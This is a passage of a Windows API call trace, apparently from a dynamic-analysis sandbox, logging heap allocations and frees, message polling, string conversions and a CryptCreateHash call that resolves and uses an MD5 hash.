lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50bd8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0144.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0144.207] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0144.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0144.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0144.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0144.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0144.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0144.287] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0144.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0144.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0144.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0144.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0144.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0144.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0144.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0144.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0144.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0144.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0144.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0144.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0144.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ed8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.325] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0144.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0144.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0144.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e48 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0144.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0144.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0144.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0144.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0144.327] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0144.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0144.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0144.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0144.331] RtlAllocateHeap (HeapHandle=0x970000, 